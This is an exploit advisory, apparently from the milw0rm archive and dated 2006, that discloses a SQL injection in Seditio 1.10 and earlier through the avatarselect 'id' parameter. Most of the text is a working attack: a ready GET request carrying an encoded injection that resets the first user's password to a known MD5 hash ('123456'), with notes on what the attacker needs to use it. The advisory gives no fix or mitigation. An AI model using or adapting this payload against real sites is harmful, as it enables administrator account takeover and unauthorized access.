13 lines
812 B
Text
Executable file
13 lines
812 B
Text
Executable file
Seditio <= 1.10 Remote SQL Injection (avatarselect id) Vulnerability
|
|
Discovered by: nukedx
|
|
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
|
|
Original advisory can be found at: http://www.nukedx.com/?viewdoc=52
|
|
----
|
|
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
|
|
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to 123456
|
|
The XVALUE is comes with your avatarselect link it's special to everyuser in Seditio.
|
|
For using this vulnerability you must be logged in to Seditio...
|
|
|
|
# nukedx.com [2006-11-21]
|
|
|
|
# milw0rm.com [2006-11-21]
|